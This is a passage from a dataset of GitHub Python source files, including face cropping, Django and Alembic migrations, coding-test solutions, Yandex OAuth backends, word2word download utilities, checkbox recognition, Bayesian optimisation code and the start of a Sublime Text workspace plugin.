img_width)\n \n #crops the new image from the original one\n face = temp_file[north : south, west : east]\n \n\n #if image is a PNG, we can add extend the height above the top of the head to make sure every cropped image has the same space above their head. 
\n #This is useful if you have images of tall individuals with very little space between the top of his/her head\n if ext.lower() in PNGS:\n extra_height = height_px - min(int(y0 + 0.5*h + ((50+self.height_asy)/100)*height_px), img_height)\n if extra_height > 0:\n extra_layer = np.full((extra_height, face.shape[1], 4), 255, dtype='uint8')\n extra_layer[:, :, 3] = 0 #value of 0 is a white background\n face = np.concatenate((extra_layer, face), axis=0)\n \n cropped_face = Image.fromarray(face)\n \n #only looks for the first face it can find if in preview mode\n if preview:\n return cropped_face\n break\n \n \n file_name_folder = file_name.rstrip()\n\n #saves the cropped image\n if bool_folder: \n if not os.path.exists('{0}/{1}/{2}'.format(output_path, folder_name, str(file_name_folder))): #checks if directory already exists\n os.makedirs('{0}/{1}/{2}'.format(output_path, folder_name, str(file_name_folder)))\n if k==1:\n cropped_face.save('{0}/{1}/{2}/{2}{3}{4}'.format(output_path, folder_name, str(file_name_folder), self.tag, ext))\n else:\n cropped_face.save('{0}/{1}/{2}/{2}{3}_{4}{5}'.format(output_path, folder_name, str(file_name_folder), self.tag, k, ext)) \n \n else:\n if not os.path.exists('{0}/{1}'.format(output_path, folder_name)): #checks if directory already exists\n os.mkdir('{0}/{1}'.format(output_path, folder_name))\n if k==1:\n cropped_face.save('{0}/{1}/{2}{3}{4}'.format(output_path, folder_name, str(file_name), self.tag, ext))\n else:\n cropped_face.save('{0}/{1}/{2}{3}_{4}{5}'.format(output_path, folder_name, str(file_name), self.tag, k, ext))\n \n #checks if program couldn't find any face for an image. If so, will save the original image in a seperate folder\n if k == 0:\n if preview:\n pass\n \n else:\n print('{}: Failed to detect face'.format(file_name))\n if not os.path.exists('{0}/{1}'.format(output_path, self.failure_folder)):\n os.mkdir('{0}/{1}'.format(output_path, self.failure_folder))\n Image.fromarray(temp_file).save('{0}/{1}/{2}{3}'.format(output_path, self.failure_folder, str(file_name), ext))\n \n continue \n \n\n","repo_name":"TomoLPT/face-detection-cropping","sub_path":"main/facecrop.py","file_name":"facecrop.py","file_ext":"py","file_size_in_byte":10026,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"94"}
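# To make the box arithmetic in crop_save above easier to follow: the network returns face coordinates as fractions of the input size, which are scaled back to pixels before the crop window is positioned around the face centre. A standalone numeric illustration (all numbers invented):
import numpy as np

img_width, img_height = 1200, 800
box = np.array([0.40, 0.25, 0.55, 0.50]) * np.array(
    [img_width, img_height, img_width, img_height])
x0, y0, x1, y1 = box.astype("int")   # 480, 200, 660, 400
w, h = x1 - x0, y1 - y0              # face is 180 x 200 px
centre_x = int(x0 + 0.5 * w)         # 570, used to anchor the crop window
print((x0, y0, x1, y1), centre_x)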
+{"seq_id":"14233416523","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.core.validators\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Entry',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('username', models.CharField(max_length=100)),\n ('spammed_number', models.CharField(max_length=256, validators=[django.core.validators.RegexValidator(b'^[0-9]*$', b'Please Enter a Valid Phone Number')])),\n ],\n ),\n ]\n","repo_name":"mohamed-alattal/androidApi","sub_path":"server/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"18761141136","text":"#https://programmers.co.kr/learn/courses/30/lessons/42579\n\nimport collections\n'''\n속한 노래가 많이 재생된 장르를 먼저 수록합니다.\n장르 내에서 많이 재생된 노래를 먼저 수록합니다.\n장르 내에서 재생 횟수가 같은 노래 중에서는 고유 번호가 낮은 노래를 먼저 수록합니다.\n'''\ndef solution(genres, plays):\n answer = []\n\n genres_idx = collections.defaultdict(list)\n genres_play = collections.defaultdict(int)\n\n for i,g in enumerate(genres):\n genres_idx[g].append((i,plays[i]))\n\n for g,play in zip(genres,plays):\n genres_play[g] = genres_play[g] + play\n\n play_sort = []\n for s in list(set(genres)):\n play_sort.append((s,genres_play[s]))\n play_sort = sorted(play_sort,reverse=True,key=(lambda x:x[1]))\n\n for g,p_n in play_sort:\n genres_idx[g] = sorted(genres_idx[g],reverse=True,key=(lambda x:x[1]))\n temp = list(map(lambda x:x[0],genres_idx[g][0:2]))\n for i in temp:\n answer.append(i)\n\n return answer\n\n\n'''\n변수명 날잡고 바꾸기\n\n'''","repo_name":"ddobokki/coding-test-practice","sub_path":"프로그래머스/해쉬/42579.py","file_name":"42579.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"35819743853","text":"from AugmentedKGE.Models.TransE import TransE\nimport torch\n\n\nclass KelpieTransE(TransE):\n\n def __init__(self, ent_total, rel_total, dim, norm=2):\n print(f\"Dim given: {dim}\")\n super(KelpieTransE, self).__init__(ent_total, rel_total, dim)\n\n def load_kelpie_model(self, id_to_entity, id_to_relation):\n \"\"\"\n Loads embeddings from Kelpie implementation of TransE to aKGE implementation of TransE\n\n Parameters:\n id_to_entity (Dict): Mapping from aKGE dataset entity id to kelpie embedding\n id_to_relation (Dict): Mapping from aKGE dataset relation id to kelpie embedding\n \"\"\"\n\n entity_embedding = torch.rand(self.ent_tot, self.dim)\n relation_embedding = torch.rand(self.rel_tot, self.dim)\n\n print(f\"Shape of entity embedding: {entity_embedding.shape}\")\n print(f\"Length of id to entity: {len(id_to_entity)}\")\n print(f\"Dimension 2 of id_to_entity: {len(id_to_entity[0])}\")\n for i in range(0, self.ent_tot):\n entity_embedding[i, :] = id_to_entity[i]\n\n for i in range(0, self.rel_tot):\n relation_embedding[i, :] = id_to_relation[i]\n\n self.embeddings[\"entity\"][\"e\"].emb.data = entity_embedding\n self.embeddings[\"relation\"][\"r\"].emb.data = relation_embedding\n\n def test_kelpie_load(self, id_to_entity, id_to_relation):\n\n flag_entity = True\n flag_relation = True\n\n for i in range(self.ent_tot):\n if not torch.equal(id_to_entity[i], self.embeddings[\"entity\"][\"e\"].emb.data[i, :]):\n flag_entity = False\n break\n\n for i in range(self.rel_tot):\n if not torch.equal(id_to_relation[i], self.embeddings[\"relation\"][\"r\"].emb.data[i, :]):\n flag_relation = False\n break\n\n print (\"Entity load successful:\", flag_entity)\n print(\"Relation load successful:\", flag_relation)","repo_name":"nari97/WWW_modelagnostic","sub_path":"Kelpie/aKGEImplementations/KelpieTransE.py","file_name":"KelpieTransE.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"6931659086","text":"# -*- coding: utf-8 -*-\nimport platform\nimport wget\nimport requests\nimport os\nimport pickle\nfrom zipfile import ZipFile\nfrom os.path import expanduser\n\n\ndef get_savedir(savedir=None):\n if savedir:\n os.makedirs(savedir, exist_ok=True)\n return savedir\n\n pf = platform.system()\n if pf == \"Windows\":\n savedir = \"C:\\word2word\"\n else:\n homedir = expanduser(\"~\")\n savedir = os.path.join(homedir, \".word2word\")\n\n if not os.path.exists(savedir):\n os.makedirs(savedir, exist_ok=True)\n return savedir\n\n\ndef exists(path):\n r = requests.head(path)\n return r.status_code == requests.codes.ok\n\n\ndef get_download_url(lang1, lang2):\n filepath = os.path.dirname(os.path.abspath(__file__)) + '/supporting_languages.txt'\n for line in open(filepath, 'r'):\n l1, l2 = line.strip().split(\"-\")\n if lang1 == l1 and lang2 == l2:\n return f\"https://mk.kakaocdn.net/dn/kakaobrain/word2word/{lang1}-{lang2}.pkl\"\n raise Exception(f\"Language pair {lang1}-{lang2} is not supported.\")\n\n\ndef download_or_load(lang1, lang2, custom_savedir):\n savedir = get_savedir(savedir=custom_savedir)\n fpath = os.path.join(savedir, f\"{lang1}-{lang2}.pkl\")\n if not os.path.exists(fpath):\n # download from cloud\n url = get_download_url(lang1, lang2)\n if url is None:\n raise ValueError(f\"Dataset not found for {lang1}-{lang2}.\")\n\n if not exists(url):\n raise ValueError(\"Sorry. There seems to be a problem with cloud access.\")\n\n print(\"Downloading data ...\")\n wget.download(url, fpath)\n word2x, y2word, x2ys = pickle.load(open(fpath, 'rb'))\n return word2x, y2word, x2ys\n\n\ndef download_os2018(lang1, lang2):\n \"\"\"Download corpora from OpenSubtitles2018.\n\n :return (lang1_file, lang2_file)\n \"\"\"\n datadir = \"data\"\n filepref = f\"OpenSubtitles.{lang1}-{lang2}\"\n if all(os.path.exists(os.path.join(datadir, f\"{filepref}.{lang}\"))\n for lang in [lang1, lang2]):\n print(f\"Found existing {filepref} files. loading...\")\n else:\n # Download and unzip parallel corpus\n url = f\"http://opus.nlpl.eu/download.php?f=OpenSubtitles/v2018/moses/{lang1}-{lang2}.txt.zip\"\n zipname = os.path.join(datadir, f\"{lang1}-{lang2}.txt.zip\")\n print(f\"Downloading {filepref}...\")\n wget.download(url, zipname)\n with ZipFile(zipname) as zf:\n for fname in zf.namelist():\n if fname.startswith(filepref):\n zf.extract(fname, datadir)\n os.remove(zipname)\n lang1_file, lang2_file = [\n os.path.abspath(os.path.join(datadir, f\"{filepref}.{lang}\"))\n for lang in [lang1, lang2]\n ]\n return lang1_file, lang2_file\n","repo_name":"kakaobrain/word2word","sub_path":"word2word/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2746,"program_lang":"python","lang":"en","doc_type":"code","stars":346,"dataset":"github-code","pt":"94"}
+{"seq_id":"71482639988","text":"#!/usr/bin/env python3\n\nimport argparse\nimport sys\nimport re\n\nfrom PIL import Image, ImageDraw, ImageOps\nfrom skimage.filters import threshold_local\nfrom enum import Enum\nimport numpy as np\nimport scipy as sp\nimport scipy.ndimage\nimport lxml.etree\n\n\n# tuned for 300 dpi grayscale text\nBLACK_LEVEL = 0.5 * 255\nFILL_THR = 0.11 # threshold for filled box\nCHECK_THR = 0.04 # threshold for checked box\nEMPTY_THR = 0.02 # threashold for empty box\n\n# H/V line rejection\nCLEAN_LEN = 47 # window length (must be odd)\nCLEAN_W = 3 # line width-1 (even)\nCLEAN_THR = 0.9 # rejection threshold\n\n# Enum for checkbox state\nclass Checkbox_State(Enum):\n Unknown = -1\n Empty = 0\n Checked = 1\n Filled = 2\n\ndef load_image(path):\n image = Image.open(path)\n image = image.convert('L')\n image = ImageOps.autocontrast(image)\n return np.array(image)\n\ndef _svg_translate(tag, tx=0, ty=0):\n if tag is None:\n return tx, ty\n trn = tag.get('transform')\n if trn is not None:\n grp = re.match(r'^translate\\(([-\\d.]+),([-\\d.]+)\\)$', trn)\n if grp is None:\n logging.error('SVG node contains unsupported transformations!')\n sys.exit(1)\n tx += float(grp.group(1))\n ty += float(grp.group(2))\n return _svg_translate(tag.getparent(), tx, ty)\n\ndef load_svg_rects(path, shape):\n data = lxml.etree.parse(path).getroot()\n dw = shape[1] / float(data.get('width'))\n dh = shape[0] / float(data.get('height'))\n rects = []\n for tag in data.iterfind('.//{*}rect'):\n tx, ty = _svg_translate(tag)\n i = tag.get('id')\n x = int((float(tag.get('x')) + tx) * dw)\n y = int((float(tag.get('y')) + ty) * dh)\n w = int(float(tag.get('width')) * dw)\n h = int(float(tag.get('height')) * dh)\n rects.append((i, x, y, w, h))\n return rects\n\n\ndef clean_image(image):\n T = threshold_local(image, 11, offset=10, method=\"gaussian\")\n clean = (image > T).astype(\"uint8\")*255\n return clean\n\n\ndef scan_marks(image, marks):\n res = []\n for i, x, y, w, h in marks:\n # roi = image[y:y+h, x:x+w]\n # scr = (roi < BLACK_LEVEL).sum() / (w*h)\n roi = image[y:y+h, x:x+w] < BLACK_LEVEL\n masked = roi[1:-1,1:-1] & roi[:-2,1:-1] & roi[2:,1:-1] & roi[1:-1,:-2] & roi[1:-1,2:]\n scr = (masked).sum() / (w*h)\n if scr > FILL_THR:\n v = Checkbox_State.Filled\n elif scr > CHECK_THR:\n v = Checkbox_State.Checked\n elif scr < EMPTY_THR:\n v = Checkbox_State.Empty\n else:\n v = Checkbox_State.Unknown\n res.append((i, v, scr))\n return res\n\n\ndef debug_marks(path, image, clean, marks, res):\n buf = Image.new('RGB', image.shape[::-1])\n buf.paste(Image.fromarray(image, 'L'))\n draw = ImageDraw.Draw(buf, 'RGBA')\n for mark, row in zip(marks, res):\n i, x, y, w, h = mark\n v = row[1]\n if v == Checkbox_State.Checked:\n c = (0, 255, 0, 127) # green\n elif v == Checkbox_State.Empty:\n c = (255, 0, 0, 127) # red\n elif v == Checkbox_State.Filled:\n c = (0, 0, 0, 64) # gray\n else:\n c = (255, 127, 0, 127) # orange\n draw.rectangle((x, y, x+w, y+h), c)\n bw = clean.copy()\n thr = bw < BLACK_LEVEL\n bw[thr] = 255\n bw[~thr] = 0\n buf.paste((0, 127, 255),\n (0, 0, image.shape[1], image.shape[0]),\n Image.fromarray(bw, 'L'))\n buf.save(path)\n\ndef print_mark_output(res, path):\n headers = [(\"Checkbox ID\", \"OMR Outcome\", \"Score\"), (\"-----------\", \"-----------\", \"-----\")]\n output = [(i, Checkbox_State(v).name, str(s)) for i, v, s in res]\n lines = headers + output\n col_width = max(len(word) for line in lines for word in line)\n with open(path,'w') as f:\n for line in lines:\n formatted_line = 
\"\\t\".join(word.ljust(col_width) for word in line)\n f.write(formatted_line + \"\\n\")\n print(formatted_line)\n\ndef main():\n ap = argparse.ArgumentParser()\n ap.add_argument('template', help='Data template (svg)')\n ap.add_argument('image', help='Image to analyze')\n ap.add_argument('text', help='Text output to file')\n ap.add_argument('-d', dest='debug', help='Debug marks to file')\n args = ap.parse_args()\n\n # load data\n image = load_image(args.image)\n marks = load_svg_rects(args.template, image.shape)\n if len(marks) == 0:\n logging.warn('template contains no marks')\n return 1\n\n # process\n clean = clean_image(image)\n res = scan_marks(clean, marks)\n if args.debug:\n debug_marks(args.debug, image, clean, marks, res)\n\n # output\n print_mark_output(res, args.text)\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"eellison/digitize-mtc","sub_path":"scripts/simpleomr.py","file_name":"simpleomr.py","file_ext":"py","file_size_in_byte":4753,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"}
+{"seq_id":"43828231703","text":"#User function Template for python3\n\nclass Solution:\n def beautySum(self, s):\n ans = 0\n \n for i in range(len(s)):\n d = {}\n \n for j in range(i, len(s)):\n if s[j] in d:\n d[s[j]] += 1\n else:\n d[s[j]] = 1\n \n mf = max(d.values())\n lf = min(d.values())\n ans += (mf - lf)\n \n return ans\n\n\n#{ \n # Driver Code Starts\n#Initial Template for Python 3\n\nif __name__ == '__main__':\n t = int(input())\n for _ in range(t):\n s = input()\n ob = Solution()\n print(ob.beautySum(s))\n# } Driver Code Ends","repo_name":"Rubal0990/GFG-DSA","sub_path":"Sum of Beauty of All Substrings - GFG/sum-of-beauty-of-all-substrings.py","file_name":"sum-of-beauty-of-all-substrings.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"}
+{"seq_id":"8602687004","text":"\"\"\"\nYandex OpenID and OAuth2 support.\n\nThis contribution adds support for Yandex.ru OpenID service in the form\nopenid.yandex.ru/user. Username is retrieved from the identity url.\n\nIf username is not specified, OpenID 2.0 url used for authentication.\n\"\"\"\nimport json\nfrom urllib import urlencode\nfrom urlparse import urlparse, urlsplit\n\nfrom social.backends.open_id import OpenIdAuth\nfrom social.backends.oauth import BaseOAuth2, OAuthAuth\n\n\nclass YandexOpenId(OpenIdAuth):\n \"\"\"Yandex OpenID authentication backend\"\"\"\n name = 'yandex-openid'\n URL = 'http://openid.yandex.ru'\n\n def get_user_id(self, details, response):\n return details['email'] or response.identity_url\n\n def get_user_details(self, response):\n \"\"\"Generate username from identity url\"\"\"\n values = super(YandexOpenId, self).get_user_details(response)\n values['username'] = values.get('username') or\\\n urlsplit(response.identity_url)\\\n .path.strip('/')\n values['email'] = values.get('email', '')\n return values\n\n\nclass YandexOAuth(OAuthAuth):\n \"\"\"Yandex OAuth authentication backend\"\"\"\n name = 'yandex-oauth'\n AUTHORIZATION_URL = 'https://oauth.yandex.ru/authorize'\n ACCESS_TOKEN_URL = 'https://oauth.yandex.ru/token'\n REDIRECT_STATE = False\n EXTRA_DATA = [\n ('id', 'id'),\n ('expires', 'expires')\n ]\n\n def get_user_details(self, response):\n return get_user_details(response)\n\n def user_data(self, access_token, response, *args, **kwargs):\n url = 'https://api-yaru.yandex.ru/me/'\n return user_data(self, url, access_token, response, *args, **kwargs)\n\n\nclass YandexOAuth2(BaseOAuth2):\n \"\"\"Legacy Yandex OAuth2 authentication backend\"\"\"\n name = 'yandex-oauth2'\n AUTHORIZATION_URL = 'https://oauth.yandex.com/authorize'\n ACCESS_TOKEN_URL = 'https://oauth.yandex.com/token'\n REDIRECT_STATE = False\n\n def get_user_details(self, response):\n return get_user_details(response)\n\n def user_data(self, access_token, response, *args, **kwargs):\n url = self.setting('API_URL')\n reply = user_data(self, url, access_token, response, *args, **kwargs)\n if reply:\n if isinstance(reply, list) and len(reply) >= 1:\n reply = reply[0]\n if 'links' in reply:\n userpic = reply['links'].get('avatar')\n elif 'avatar' in reply:\n userpic = reply['avatar'].get('Portrait')\n else:\n userpic = ''\n reply.update({'id': reply['id'].split(\"/\")[-1],\n 'access_token': access_token,\n 'userpic': userpic})\n return reply\n\n\ndef get_user_details(response):\n \"\"\"Return user details from Yandex account\"\"\"\n name = response['name']\n last_name = ''\n\n if ' ' in name:\n names = name.split(' ')\n last_name = names[0]\n first_name = names[1]\n else:\n first_name = name\n\n try:\n host = urlparse(response.get('links').get('www')).hostname\n username = host.split('.')[0]\n except (IndexError, AttributeError):\n username = name.replace(' ', '')\n\n return {\n 'username': username,\n 'email': response.get('email', ''),\n 'first_name': first_name,\n 'last_name': last_name,\n }\n\n\ndef user_data(backend, url, access_token, response, *args, **kwargs):\n \"\"\"Loads user data from service\"\"\"\n url = url + '?' 
+ urlencode({\n 'oauth_token': access_token,\n 'format': 'json',\n 'text': 1\n })\n try:\n return json.load(backend.urlopen(url))\n except (ValueError, IndexError):\n return None\n","repo_name":"klinkin/python-social-auth","sub_path":"social/backends/yandex.py","file_name":"yandex.py","file_ext":"py","file_size_in_byte":3726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"94"}
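# A small illustration of the name-splitting rule in get_user_details above: a space in the Yandex profile name makes the first token the last name, and the username falls back to the first label of the www link's hostname. The response dict is fabricated, and the call assumes the (Python 2 era) module above is importable:
response = {'name': 'Ivanov Ivan',
            'email': 'ivan@example.com',
            'links': {'www': 'http://ivanov.ya.ru/'}}
print(get_user_details(response))
# {'username': 'ivanov', 'email': 'ivan@example.com',
#  'first_name': 'Ivan', 'last_name': 'Ivanov'}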
+{"seq_id":"25319546745","text":"import numpy as np\nfrom tfbo.optimizers.optimizer_class import optimizer\nfrom tfbo.models.square_distances import square_dists_np\nfrom tfbo.components.initializations import initialize_models, initialize_acquisition\nimport gpflow\nfrom tfbo.utils.import_modules import import_attr\n\n\nclass manual_bo_optimizer(optimizer):\n def __init__(self, xy_start, proj_dim, objective, loss, **kwargs):\n super().__init__(xy_start, proj_dim, objective, loss)\n self.decomposition = [np.arange(start=i * self.proj_dim, stop=(i+1) * self.proj_dim) for i in\n range(int(np.floor(self.input_dim/self.proj_dim)))]\n self.lipschitz_const = self.objective.lipschitz_const # 1e01 # check with bin_size\n self.initialize_normalization()\n self.log_lik_opt = []\n self.hyps_opt = []\n\n def remove_inconsistencies(self, _x, _y):\n indices_opt = list(range(len(self.decomposition)))\n select_component_i = lambda index_j: np.copy(_x[:, self.decomposition[index_j]])\n Xselected = list(map(select_component_i, indices_opt))\n\n euclidean_dists2y = square_dists_np(_y, _y)\n def select_consistent(Xselected_i):\n euclidean_dists2x = square_dists_np(Xselected_i, Xselected_i) # double check with tf implementation\n indices_cons_i = self.select_data_indices(euclidean_dists2x, euclidean_dists2y, _y)\n return np.copy(Xselected_i[indices_cons_i, :]), np.copy(_y[indices_cons_i, :])\n XY_cons = list(map(select_consistent, Xselected))\n _Xcons = [XY_cons_i[0] for XY_cons_i in XY_cons]\n _Ycons = [XY_cons_i[1] for XY_cons_i in XY_cons]\n return _Xcons, _Ycons\n\n def select_data_indices(self, square_dists_x, square_dists_y, _y):\n assert np.max(np.abs(np.diag(square_dists_x) - np.diag(square_dists_y))) < 1e-12\n Lp = np.sqrt(square_dists_y) > self.lipschitz_const * np.sqrt(square_dists_x) # violate lipschitz continuity -> 1 = inconsistencies\n i_triangle, j_triangle = np.triu_indices(n=square_dists_x.shape[0], k=1) # collect upper triangular indices\n\n Lp_triang = np.copy(Lp[i_triangle, j_triangle])\n\n if np.any(Lp_triang):\n i_triangle_true = np.copy(i_triangle[Lp_triang])[:, None]\n j_triangle_true = np.copy(j_triangle[Lp_triang])[:, None]\n indices_pairs_inc = np.concatenate([i_triangle_true, j_triangle_true], axis=1) # i,j indices of inconsistent pairs\n\n pw_max = lambda ij: self.select_max(ind_ij=ij, _Y=_y)\n indices_to_remove_list = list(np.ravel(list(map(pw_max, list(indices_pairs_inc)))))\n consistent_selection = np.ones(shape=square_dists_x.shape[0], dtype=bool)\n if indices_to_remove_list: # empty sequences are false, if nonempty\n indices_to_remove_norep = list(set(indices_to_remove_list)) # self.remove_reps(indices_to_remove_list) remove repeated indices in list\n consistent_selection[indices_to_remove_norep] = False # !indices_to_remove_norep have lost order!\n else:\n consistent_selection = np.ones(shape=square_dists_x.shape[0], dtype=bool)\n return consistent_selection\n\n def remove_reps(self, indices_list):\n bag_of_indices = np.copy(np.array([indices_list[0]]))[:, None] # why [0]\n for i in range(len(indices_list) - 1):\n index_new = indices_list[i+1]\n if all([index_i != index_new for index_i in list(bag_of_indices)]):\n bag_of_indices = np.concatenate([bag_of_indices, np.copy(np.array([index_new]))[:, None]], axis=0)\n i += int(1)\n return bag_of_indices\n\n def select_max(self, ind_ij, _Y):\n # _Y = self.data_y\n if _Y[ind_ij[0]] >= _Y[ind_ij[1]]:\n return np.array([np.copy(ind_ij[0])])\n else:\n return np.array([np.copy(ind_ij[1])])\n\n def initialize_single_model(self, 
x_consist_i, y_consist_i):\n kernel_out, model_out = initialize_models(x=np.copy(x_consist_i), y=np.copy(y_consist_i),\n input_dim=self.proj_dim, model='GPR', kernel='Matern52', ARD=True)\n return kernel_out, model_out\n\n def compose_x(self, x_list):\n x0 = np.zeros(shape=[x_list[0].shape[0], self.proj_dim * len(x_list)]) # check shapes of x_i\n for x_i, indices_i in zip(x_list, self.decomposition):\n x0[:, indices_i] = x_i # if I change x_i changes x0?\n return x0\n\n def evaluate(self, x_list):\n x_tp1 = self.compose_x(x_list) # check shape\n y_tp1 = self.objective.f(x_tp1, noisy=True, fulldim=False)\n return y_tp1\n\n def fit_gp(self, gp):\n self.hyps_opt = []\n signal_variance = np.random.uniform(low=0., high=10, size=10)[:, None]\n noise_variance = signal_variance * 0.01\n log_lik = []\n for signal_i, noise_i in zip(list(signal_variance), list(noise_variance)):\n gp = self.reset_hyps(gp)\n gp.kern.variance = signal_i[0]\n gp.likelihood.variance = noise_i[0]\n try:\n gpflow.train.ScipyOptimizer().minimize(gp)\n except:\n gp = self.reset_hyps(gp)\n log_lik.append(gp.compute_log_likelihood())\n self.hyps_opt.append(self.get_hyps(gp))\n\n np_log_liks = np.array(log_lik)\n index_opt = np.argmax(np_log_liks)\n gp = self.assign_hyps(gp, self.hyps_opt[index_opt])\n self.log_lik_opt.append(np_log_liks[index_opt])\n return gp\n\n def optimize_ith_model(self, gp_i, i, opt_config):\n # gp_i = self.reset_hyps(gp_i)\n gp_i = self.fit_gp(gp_i)\n # try:\n # gpflow.train.ScipyOptimizer().minimize(gp_i)\n # except:\n # gp_i = self.reset_hyps(gp_i)\n self.hyps.append(self.get_hyps(gp_i))\n\n kwargs = {'ymin': self.Ynorm.min()}\n acquisition = initialize_acquisition(self.loss, gp_i, **kwargs)\n acquisition_norm = lambda x: \\\n self.acquisition_norm(acquisition=acquisition, x=x,\n X_proj_mean=np.copy(self.X_mean[:, self.decomposition[i]]),\n X_proj_std=np.copy(self.X_std[:, self.decomposition[i]]))\n x_opt, acq_opt = self.minimize_acquisition(acquisition_norm, opt_config)\n return x_opt, acq_opt\n\n def update_data(self, xnew, ynew):\n self.data_x = np.concatenate([self.data_x, xnew], axis=0)\n self.data_y = np.concatenate([self.data_y, ynew], axis=0)\n self.initialize_normalization()\n\n def update_models(self, list_gp, list_x, list_y):\n for gp_i, x_i, y_i in zip(list_gp, list_x, list_y):\n gp_i.X = np.copy(x_i)\n gp_i.Y = np.copy(y_i)\n return list_gp\n\n def run(self, maxiters):\n # Normalization -> decomposition -> initialization/update of each GP model\n list_Xnorm_cons, list_Ynorm_cons = self.remove_inconsistencies(_x=np.copy(self.Xnorm), _y=np.copy(self.Ynorm))\n list_km_out = list(map(self.initialize_single_model, list_Xnorm_cons, list_Ynorm_cons))\n # list_kernels = [km_i[0] for km_i in list_km_out]\n list_gpmodels = [km_i[1] for km_i in list_km_out]\n opt_config = import_attr('tfbo/configurations', attribute='acquisition_opt')\n opt_config['bounds'] = [(0., 1.)] * self.proj_dim * self.num_init\n\n list_components = list(range(len(self.decomposition)))\n optimize_i = lambda gp_i, i: self.optimize_ith_model(gp_i, i, opt_config)\n\n for j in range(maxiters):\n print(j)\n\n list_xa = list(map(optimize_i, list_gpmodels, list_components)) # check double input\n\n list_x = [xa_i[0] for xa_i in list_xa]\n x_out = self.compose_x(list_x)\n y_out = self.evaluate(list_x)\n self.update_data(xnew=x_out, ynew=y_out) # augment dataset and normalize\n list_Xnorm_cons, list_Ynorm_cons = self.remove_inconsistencies(_x=np.copy(self.Xnorm), _y=np.copy(self.Ynorm)) # decompose and prune\n self.reset_graph()\n 
list_km_out = list(map(self.initialize_single_model, list_Xnorm_cons, list_Ynorm_cons))\n list_gpmodels = [km_i[1] for km_i in list_km_out]\n # list_gpmodels = self.update_models(list_gp=list_gpmodels, list_x=list_Xnorm_cons, list_y=list_Ynorm_cons)\n return self.data_x, self.data_y, self.hyps, self.log_lik_opt","repo_name":"rm4216/BayesOpt","sub_path":"tfbo/optimizers/manual_bo_optimizer.py","file_name":"manual_bo_optimizer.py","file_ext":"py","file_size_in_byte":8456,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"94"}
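# The pruning rule in select_data_indices above reduces to: a pair (i, j) is inconsistent when |y_i - y_j| > L * ||x_i - x_j||, and the point with the larger objective value is dropped. A toy check with invented numbers:
import numpy as np

L = 1.0                          # stands in for lipschitz_const
x = np.array([[0.0], [0.1]])
y = np.array([[0.0], [5.0]])     # jump of 5 over a distance of 0.1

dist_x = float(np.abs(x[0] - x[1]))
dist_y = float(np.abs(y[0] - y[1]))
violates = dist_y > L * dist_x   # True: 5 > 0.1
drop = int(np.argmax(y)) if violates else None
print(violates, drop)            # True 1 -> the larger-y point is removed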
+{"seq_id":"21401206744","text":"\"\"\"Adds modified to PureApiPub pk.\n\nRevision ID: c1dc63b64dd8\nRevises: e1ff947af0c9\nCreate Date: 2018-05-28 14:58:59.433055\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import oracle\n\n# revision identifiers, used by Alembic.\nrevision = 'c1dc63b64dd8'\ndown_revision = 'e1ff947af0c9'\nbranch_labels = None\ndepends_on = None\n\ndef upgrade():\n op.drop_constraint(\n 'SYS_C00492426',\n 'pure_api_pub',\n type_='primary'\n )\n op.create_primary_key(\n 'SYS_C00492426',\n 'pure_api_pub',\n ['uuid','modified']\n )\n\ndef downgrade():\n op.drop_constraint(\n 'SYS_C00492426',\n 'pure_api_pub',\n type_='primary'\n )\n op.create_primary_key(\n 'SYS_C00492426',\n 'pure_api_pub',\n ['uuid']\n )\n","repo_name":"UMNLibraries/experts_dw","sub_path":"alembic/versions/c1dc63b64dd8_adds_modified_to_pureapipub_pk.py","file_name":"c1dc63b64dd8_adds_modified_to_pureapipub_pk.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"}
+{"seq_id":"33323596097","text":"#!/usr/bin/env python\n\n\"\"\"A sublime-text plugin for saving and loading easy workspaces\n\nThis module contains code for the sublime-text plugin EasyWorkspace.\n\nEasyWorkspace aims to provide an easier way for saving and loading workspaces\nin sublime-text. The native sublime-text workspace functionality, while useful in\nsome situations, has a few drawbacks that this plugin wishes to alleviate.\n\nParticularly, EasyWorkspace provides the following features:\n\n 1. Save and Load your current workspace!\n - save your window folders, layout, and views with a quick key command!\n\n 2. No need for a sublime project!\n - While native sublime-workspace support requires you to be working\n within a sublime-project, EasyWorkspace does not!\n\n 2. Simpler Files\n - An EasyWorkspace workspace file only contains a window layout and a series\n of views within each. That's it!\n\n\"\"\"\n\n################################################################################\n# Imports\n\nimport sublime\nimport sublime_plugin\n\nimport os\nimport datetime\nimport time\n\n################################################################################\n# Workspace Data\n################################################################################\n\nclass EasyWorkspace:\n \"\"\" represents an easy workspace \"\"\"\n\n def __init__(self):\n self.layout = dict(rows=[0.0, 1.0], cells=[[0, 0, 1, 1]], cols=[0.0, 1.0])\n self.folders = []\n self.active = ()\n self.groups = []\n\n self.filename = \"\"\n\n ############################################################################\n # File IO\n\n def saveToFile(self, filename):\n \"\"\" Saves this workspace to a file\n\n Arguments:\n filename -- the workspace file to write\n\n Returns: true if file was saved, false otherwise\n \"\"\"\n\n # ensure path exists\n fileDir = 